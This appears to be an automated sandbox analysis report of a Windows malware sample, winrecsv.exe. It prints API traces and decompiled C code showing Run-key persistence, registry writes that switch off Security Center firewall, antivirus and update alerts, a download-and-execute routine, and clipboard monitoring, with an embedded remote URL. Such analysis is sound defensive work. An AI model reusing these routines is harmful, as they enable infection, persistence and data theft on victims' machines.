                                                                                  • MoveFileW.KERNEL32(argarhrharharfafrahth,4yy4w4yw4fwgwgw), ref: 004061C3
                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,984658), ref: 004061E8
                                                                                  • GetLastError.KERNEL32 ref: 004061F4
                                                                                  • ExitProcess.KERNEL32 ref: 00406203
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\winrecsv.exe,00000105), ref: 00406229
                                                                                  • PathFindFileNameW.SHLWAPI(C:\Windows\winrecsv.exe), ref: 00406234
                                                                                  • wsprintfW.USER32 ref: 00406251
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00406261
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00406278
                                                                                  • ExitProcess.KERNEL32 ref: 0040632D
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00406344
                                                                                  • wsprintfW.USER32 ref: 00406362
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 00406379
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00406390
                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004063AE
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040642E
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040643B
                                                                                  • ExitProcess.KERNEL32 ref: 0040645A
                                                                                  • Sleep.KERNEL32(000001F4), ref: 00406465
                                                                                  • wsprintfW.USER32 ref: 00406483
                                                                                  • CopyFileW.KERNEL32(C:\Windows\winrecsv.exe,?,00000000), ref: 0040649A
                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 004064B1
                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 004064CF
                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 0040654F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040655C
                                                                                  • ExitProcess.KERNEL32 ref: 0040657B
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00406586
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 004065A4
                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004065CB
                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004065EA
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406609
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406628
                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406647
                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406666
                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406685
                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 00406692
                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 004066B0
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004066D7
                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004066F6
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00406715
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406734
                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406753
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406772
                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406791
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040679E
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 004067A9
                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004067CB
                                                                                  • wsprintfW.USER32 ref: 004067E2
                                                                                  • wsprintfW.USER32 ref: 004067FC
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00404000,00000000,00000000,00000000), ref: 00406814
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0040681F
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,004050B0,00000000,00000000,00000000), ref: 00406834
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 0040683F
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00405900,00000000,00000000,00000000), ref: 00406854
                                                                                  • Sleep.KERNELBASE(00002710), ref: 0040685F
                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040687C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Delete$Sleep$Move$Value$Internet$Window$CloseOpen$FindHandle$Createwsprintf$ExitProcess$ForegroundShowThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsLastModuleMutexStartup
                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tncmds.dat$%s\tnnodes.dat$%userprofile%$%windir%$(#$,$2#$2dgd828d8g8fg8g8g$4yy4w4yw4fwgwgw$579795729858927452784$7$984658$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tncmds.dat$C:\Users\user\tnnodes.dat$C:\Windows\winrecsv.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$aefafugaugfgauegf$aefyaiegfayegfg$argarhargafafargh$argarhrharharfafrahth$feu8gf8g2gf8g2fg$ffag8f2g8fg82g8f8g8fg$http://2462462645.fr/$ttyu8ruy8uy8u8yu$winrecsv.exe
                                                                                  • API String ID: 1472887078-1332927177
                                                                                  • Opcode ID: 225aaf5d50bbc80c1c59e5006c2e5804e7773863bb7f647180ff1c9cfd19a09c
                                                                                  • Instruction ID: 5381a988ab4d71a95ab7e29ec0f43e912bf8196cdff92c6a99a63db8bd3eacf6
                                                                                  • Opcode Fuzzy Hash: 225aaf5d50bbc80c1c59e5006c2e5804e7773863bb7f647180ff1c9cfd19a09c
                                                                                  • Instruction Fuzzy Hash: 5472EF71680314ABD7209F90AC4AFD97B74BB48B06F2085A5F709B61D0DAF85AC4CF5D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				void* _t112;
                                                                                  				void* _t115;
                                                                                  				int _t119;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_t112 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0); // executed
                                                                                  					_v1576 = _t112;
                                                                                  					if(_v1576 != 0) {
                                                                                  						_t115 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                  						_v1580 = _t115;
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(1) {
                                                                                  								_t119 = InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372); // executed
                                                                                  								if(_t119 == 0 || _v2372 == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0); // executed
                                                                                  							}
                                                                                  							FindCloseChangeNotification(_v1580); // executed
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524); // executed
                                                                                  							Sleep(0x3e8); // executed
                                                                                  							_t125 = E0040D580( &_v1572); // executed
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572); // executed
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}

































                                                                                  0x0040d8a0
                                                                                  0x0040d8a5
                                                                                  0x0040d8a8
                                                                                  0x0040d8c0
                                                                                  0x0040d8c9
                                                                                  0x0040d8d8
                                                                                  0x0040d8de
                                                                                  0x0040d8e6
                                                                                  0x0040d8ec
                                                                                  0x0040d8f3
                                                                                  0x0040d908
                                                                                  0x0040d923
                                                                                  0x0040d92b
                                                                                  0x0040d930
                                                                                  0x0040d93f
                                                                                  0x0040d944
                                                                                  0x0040d966
                                                                                  0x0040d96c
                                                                                  0x0040d982
                                                                                  0x0040d98f
                                                                                  0x0040d9ab
                                                                                  0x0040d9b1
                                                                                  0x0040d9be
                                                                                  0x0040d9da
                                                                                  0x0040d9e0
                                                                                  0x0040d9ed
                                                                                  0x0040d9f3
                                                                                  0x0040da0d
                                                                                  0x0040da15
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040da3e
                                                                                  0x0040da3e
                                                                                  0x0040da4d
                                                                                  0x0040da66
                                                                                  0x0040da76
                                                                                  0x0040da81
                                                                                  0x0040da8e
                                                                                  0x0040da93
                                                                                  0x0040da9b
                                                                                  0x0040dae0
                                                                                  0x0040da9d
                                                                                  0x0040daa2
                                                                                  0x0040daaf
                                                                                  0x0040dab4
                                                                                  0x0040dabd
                                                                                  0x0040dac6
                                                                                  0x0040daca
                                                                                  0x0040daca
                                                                                  0x0040dad0
                                                                                  0x0040dad0
                                                                                  0x0040dad7
                                                                                  0x0040da9b
                                                                                  0x0040daed
                                                                                  0x0040daed
                                                                                  0x0040dafa
                                                                                  0x0040dafa
                                                                                  0x0040db07
                                                                                  0x0040db12
                                                                                  0x0040db18
                                                                                  0x0040db21
                                                                                  0x0040db27
                                                                                  0x0040db2c
                                                                                  0x0040db3e
                                                                                  0x0040db44
                                                                                  0x0040db49
                                                                                  0x0040db58
                                                                                  0x0040db5d
                                                                                  0x0040db7f
                                                                                  0x0040db88
                                                                                  0x0040db8a
                                                                                  0x0040db92
                                                                                  0x0040db99
                                                                                  0x0040db9a
                                                                                  0x0040db9c
                                                                                  0x0040dba3
                                                                                  0x0040dbbc
                                                                                  0x0040dbcc
                                                                                  0x0040dbd7
                                                                                  0x0040dbf1
                                                                                  0x00000000
                                                                                  0x0040dc2e
                                                                                  0x0040dbf8
                                                                                  0x0040dc0d
                                                                                  0x0040dc12
                                                                                  0x00000000
                                                                                  0x0040dc1d
                                                                                  0x0040dc1f
                                                                                  0x0040dc1f
                                                                                  0x0040dc12
                                                                                  0x0040dba3
                                                                                  0x0040dc37

                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 0040D899
                                                                                  • srand.MSVCRT ref: 0040D8A0
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D8C0
                                                                                  • mbstowcs.NTDLL ref: 0040D923
                                                                                  • rand.MSVCRT ref: 0040D92B
                                                                                  • rand.MSVCRT ref: 0040D93F
                                                                                  • wsprintfW.USER32 ref: 0040D966
                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D97C
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D9AB
                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D9DA
                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040DA0D
                                                                                  • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040DA3E
                                                                                  • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040DA4D
                                                                                  • wsprintfW.USER32 ref: 0040DA66
                                                                                  • DeleteFileW.KERNELBASE(?), ref: 0040DA76
                                                                                  • ExitProcess.KERNEL32 ref: 0040DACA
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DAA2
                                                                                    • Part of subcall function 0040D740: memset.NTDLL ref: 0040D74E
                                                                                    • Part of subcall function 0040D740: CreateProcessW.KERNELBASE ref: 0040D795
                                                                                    • Part of subcall function 0040D740: Sleep.KERNELBASE(000003E8), ref: 0040D7A5
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DAE0
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040DAED
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DAFA
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040DB07
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DB12
                                                                                  • rand.MSVCRT ref: 0040DB27
                                                                                  • Sleep.KERNEL32 ref: 0040DB3E
                                                                                  • rand.MSVCRT ref: 0040DB44
                                                                                  • rand.MSVCRT ref: 0040DB58
                                                                                  • wsprintfW.USER32 ref: 0040DB7F
                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040DB9C
                                                                                  • wsprintfW.USER32 ref: 0040DBBC
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DBCC
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040DBD7
                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040DA81
                                                                                    • Part of subcall function 0040D580: CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                    • Part of subcall function 0040D580: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                    • Part of subcall function 0040D580: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                    • Part of subcall function 0040D580: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040DBF8
                                                                                  • ExitProcess.KERNEL32 ref: 0040DC1F
                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040DC2E
                                                                                  Strings
                                                                                  • %s\%d%d.exe, xrefs: 0040D95A
                                                                                  • %s\%d%d.exe, xrefs: 0040DB73
                                                                                  • %s:Zone.Identifier, xrefs: 0040DA5A
                                                                                  • %temp%, xrefs: 0040D8BB
                                                                                  • %s:Zone.Identifier, xrefs: 0040DBB0
                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0040D977
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeletewsprintf$HandleProcess$ExitOpen$ChangeCountDownloadEnvironmentExpandFindMappingNotificationReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                  • API String ID: 48925641-2996245764
                                                                                  • Opcode ID: dfcc159c14f6122df4d80fa0c7757af7993130a48c708c2244381bfec5c2806d
                                                                                  • Instruction ID: 9292b30b737f4007fadc37ef56157f39d8097e5f89b4cfd55e16e9e87d2adf29
                                                                                  • Opcode Fuzzy Hash: dfcc159c14f6122df4d80fa0c7757af7993130a48c708c2244381bfec5c2806d
                                                                                  • Instruction Fuzzy Hash: CF91C7B1D41318ABEB20DB50DC45FEA7775BB88705F0484F9F609A61C1DAB89AC4CF58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 138 403db0-403dd2 GetWindowLongW 139 403dd4-403ddb 138->139 140 403df6-403dfd 138->140 141 403de1-403de5 139->141 142 403e67-403e78 IsClipboardFormatAvailable 139->142 143 403e26-403e2c 140->143 144 403dff 140->144 147 403e04-403e21 SetClipboardViewer SetWindowLongW 141->147 148 403de7-403deb 141->148 145 403e83-403e8d IsClipboardFormatAvailable 142->145 146 403e7a-403e81 142->146 150 403e46-403e4a 143->150 151 403e2e-403e44 SetWindowLongW 143->151 149 403fe4-403ffd DefWindowProcA 144->149 153 403e98-403ea2 IsClipboardFormatAvailable 145->153 154 403e8f-403e96 145->154 152 403eab-403eaf 146->152 147->149 155 403df1 148->155 156 403f9d-403fde RegisterRawInputDevices ChangeClipboardChain 148->156 157 403e62 150->157 158 403e4c-403e5c SendMessageA 150->158 151->157 160 403eb5-403ebf OpenClipboard 152->160 161 403f7f-403f83 152->161 153->152 159 403ea4 153->159 154->152 155->149 156->149 157->149 158->157 159->152 160->161 164 403ec5-403ed6 GetClipboardData 160->164 162 403f85-403f95 SendMessageA 161->162 163 403f9b 161->163 162->163 163->149 165 403ed8 164->165 166 403edd-403eee GlobalLock 164->166 165->149 167 403ef0 166->167 168 403ef5-403f06 166->168 167->149 169 403f08-403f0c 168->169 170 403f29-403f3c call 40b570 168->170 172 403f3e-403f4e call 403ce0 169->172 173 403f0e-403f12 169->173 178 403f51-403f65 GlobalUnlock CloseClipboard 170->178 172->178 174 403f14 173->174 175 403f16-403f27 call 403bd0 173->175 174->178 175->178 178->161 182 403f67-403f7c call 403480 call 408fb0 178->182 182->161
                                                                                  C-Code - Quality: 94%
                                                                                  			E00403DB0(struct HWND__* _a4, int _a8, int _a12, struct HWND__* _a16) {
                                                                                  				struct HWND__* _v8;
                                                                                  				int _v12;
                                                                                  				struct HWND__* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v24;
                                                                                  				short _v26;
                                                                                  				short _v30;
                                                                                  				int _v32;
                                                                                  				short _v34;
                                                                                  				char _v36;
                                                                                  				int _v40;
                                                                                  				int _v44;
                                                                                  				long _t75;
                                                                                  				struct HWND__* _t90;
                                                                                  				struct HWND__* _t97;
                                                                                  				struct HWND__* _t98;
                                                                                  				void* _t129;
                                                                                  
                                                                                  				_v8 = GetWindowLongW(_a4, 0xffffffeb);
                                                                                  				_v40 = _a8;
                                                                                  				if(_v40 > 0x308) {
                                                                                  					if(_v40 == 0x30d) {
                                                                                  						if(_a12 != _v8) {
                                                                                  							if(_v8 != 0) {
                                                                                  								SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v8 = _a16;
                                                                                  							SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  						}
                                                                                  						goto L38;
                                                                                  					} else {
                                                                                  						L38:
                                                                                  						_t75 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                  						return _t75;
                                                                                  					}
                                                                                  				}
                                                                                  				if(_v40 == 0x308) {
                                                                                  					_v12 = 0;
                                                                                  					if(IsClipboardFormatAvailable(0xd) == 0) {
                                                                                  						if(IsClipboardFormatAvailable(1) == 0) {
                                                                                  							if(IsClipboardFormatAvailable(7) != 0) {
                                                                                  								_v12 = 7;
                                                                                  							}
                                                                                  						} else {
                                                                                  							_v12 = 1;
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v12 = 0xd;
                                                                                  					}
                                                                                  					if(_v12 == 0 || OpenClipboard(0) == 0) {
                                                                                  						L34:
                                                                                  						if(_v8 != 0) {
                                                                                  							SendMessageA(_v8, _a8, _a12, _a16);
                                                                                  						}
                                                                                  					} else {
                                                                                  						_v24 = GetClipboardData(_v12);
                                                                                  						if(_v24 != 0) {
                                                                                  							_v20 = GlobalLock(_v24);
                                                                                  							if(_v20 != 0) {
                                                                                  								_v16 = 0;
                                                                                  								_v44 = _v12;
                                                                                  								if(_v44 == 1) {
                                                                                  									_t90 = E0040B570(_v20, 0, 0);
                                                                                  									_t129 = _t129 + 0xc;
                                                                                  									_v16 = _t90;
                                                                                  								} else {
                                                                                  									if(_v44 == 7) {
                                                                                  										_t97 = E00403CE0(_v20, 0, 0);
                                                                                  										_t129 = _t129 + 0xc;
                                                                                  										_v16 = _t97;
                                                                                  									} else {
                                                                                  										if(_v44 == 0xd) {
                                                                                  											_t98 = E00403BD0(_v20, _v20, 0);
                                                                                  											_t129 = _t129 + 8;
                                                                                  											_v16 = _t98;
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								GlobalUnlock(_v24);
                                                                                  								CloseClipboard();
                                                                                  								if(_v16 != 0) {
                                                                                  									E00403480(_v16);
                                                                                  									E00408FB0(_v16);
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L38;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L38;
                                                                                  				}
                                                                                  				if(_v40 == 1) {
                                                                                  					_v8 = SetClipboardViewer(_a4);
                                                                                  					SetWindowLongW(_a4, 0xffffffeb, _v8);
                                                                                  				} else {
                                                                                  					if(_v40 == 2) {
                                                                                  						_v36 = 0;
                                                                                  						_v34 = 0;
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v36 = 1;
                                                                                  						_v34 = 6;
                                                                                  						_v32 = 1;
                                                                                  						__imp__RegisterRawInputDevices( &_v36, 1, 0xc);
                                                                                  						ChangeClipboardChain(_a4, _v8);
                                                                                  					}
                                                                                  				}
                                                                                  				goto L38;
                                                                                  			}




















                                                                                  0x00403dc2
                                                                                  0x00403dc8
                                                                                  0x00403dd2
                                                                                  0x00403dfd
                                                                                  0x00403e2c
                                                                                  0x00403e4a
                                                                                  0x00403e5c
                                                                                  0x00403e5c
                                                                                  0x00403e2e
                                                                                  0x00403e31
                                                                                  0x00403e3e
                                                                                  0x00403e3e
                                                                                  0x00000000
                                                                                  0x00403dff
                                                                                  0x00403fe4
                                                                                  0x00403ff4
                                                                                  0x00403ffd
                                                                                  0x00403ffd
                                                                                  0x00403dfd
                                                                                  0x00403ddb
                                                                                  0x00403e67
                                                                                  0x00403e78
                                                                                  0x00403e8d
                                                                                  0x00403ea2
                                                                                  0x00403ea4
                                                                                  0x00403ea4
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e8f
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403e7a
                                                                                  0x00403eaf
                                                                                  0x00403f7f
                                                                                  0x00403f83
                                                                                  0x00403f95
                                                                                  0x00403f95
                                                                                  0x00403ec5
                                                                                  0x00403ecf
                                                                                  0x00403ed6
                                                                                  0x00403ee7
                                                                                  0x00403eee
                                                                                  0x00403ef5
                                                                                  0x00403eff
                                                                                  0x00403f06
                                                                                  0x00403f31
                                                                                  0x00403f36
                                                                                  0x00403f39
                                                                                  0x00403f08
                                                                                  0x00403f0c
                                                                                  0x00403f46
                                                                                  0x00403f4b
                                                                                  0x00403f4e
                                                                                  0x00403f0e
                                                                                  0x00403f12
                                                                                  0x00403f1c
                                                                                  0x00403f21
                                                                                  0x00403f24
                                                                                  0x00403f24
                                                                                  0x00403f12
                                                                                  0x00403f0c
                                                                                  0x00403f55
                                                                                  0x00403f5b
                                                                                  0x00403f65
                                                                                  0x00403f6b
                                                                                  0x00403f77
                                                                                  0x00403f7c
                                                                                  0x00000000
                                                                                  0x00403f65
                                                                                  0x00000000
                                                                                  0x00403ef0
                                                                                  0x00403ed8
                                                                                  0x00000000
                                                                                  0x00403eaf
                                                                                  0x00403de5
                                                                                  0x00403e0e
                                                                                  0x00403e1b
                                                                                  0x00403de7
                                                                                  0x00403deb
                                                                                  0x00403f9f
                                                                                  0x00403fa5
                                                                                  0x00403fa8
                                                                                  0x00403fab
                                                                                  0x00403fb4
                                                                                  0x00403fbd
                                                                                  0x00403fc1
                                                                                  0x00403fd0
                                                                                  0x00403fde
                                                                                  0x00403fde
                                                                                  0x00403deb
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DBC
                                                                                  • SetClipboardViewer.USER32(?), ref: 00403E08
                                                                                  • SetWindowLongW.USER32 ref: 00403E1B
                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 00403E70
